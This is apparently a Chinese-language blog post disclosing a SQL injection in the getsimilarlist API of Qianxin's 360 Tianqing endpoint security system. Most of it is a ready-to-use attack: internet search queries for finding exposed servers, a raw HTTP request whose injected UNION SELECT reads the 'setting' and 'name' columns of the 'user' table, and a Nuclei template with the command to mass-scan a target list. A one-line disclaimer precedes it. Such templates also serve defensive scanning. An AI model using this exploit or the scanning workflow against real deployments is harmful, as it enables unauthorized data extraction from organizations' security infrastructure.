奇安信360天擎getsimilarlist存在SQL注入漏洞

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品描述

奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统（简称“天擎”）产品。通过“体系化防御、数字化运营”方法，帮助政企客户准确识别、保护和监管终端，并确保这些终端在任何时候都能可信、安全、合规地访问数据和业务 [1] 。 [2] 天擎基于奇安信全新的“川陀”终端安全平台构建，集成高性能病毒查杀、漏洞防护、主动防御引擎，深度融合威胁情报、大数据分析和安全可视化等创新技术，通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能，帮助政企客户构建持续有效的终端安全能力。

二、漏洞描述

奇安信360天擎getsimilarlist存在SQL注入漏洞。

三、漏洞复现

fofa: banner=“QiAnXin web server” || banner=“360 web server” || body=“appid”:“skylar6” || body=“/task/index/detail?id={item.id}” || body=“已过期或者未授权，购买请联系4008-136-360”

1.手动复现

POC

GET /api/client/getsimilarlist?status%5B0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281%5D=1&status%5B0%5D=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json

BURP截图

2.自动化复现

①nulei扫描

yaml

id: qianxin-360-tianqing-getsimilarlist-sqli-rce

info:
  name: qianxin-360-tianqing-getsimilarlist-sqli-rce
  author: m0be1
  severity: high
  tags: qianxin,sqli,iot
  description: 奇安信360天擎getsimilarlist存在SQL注入漏洞
  metadata: 
    fofa-query: banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"
    verified: true
    max-request: 1

http:
  - raw:
      - |
        GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
        Host:
        User-Agent: Mozilla/5.0 

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words: 
          - "list"
          - "total"
          - "reason\":\"success"
        part: body 
        condition: and

      - type: word
        part: header
        words: 
          - "application/json" 

nuclei.exe -t qianxin-360-tianqing-getsimilarlist-sqli.yaml -l subs.txt -stats

②小龙POC检测

小龙POC检测一通哈拉少

工具下载地址

小龙POC传送门: 小龙POC工具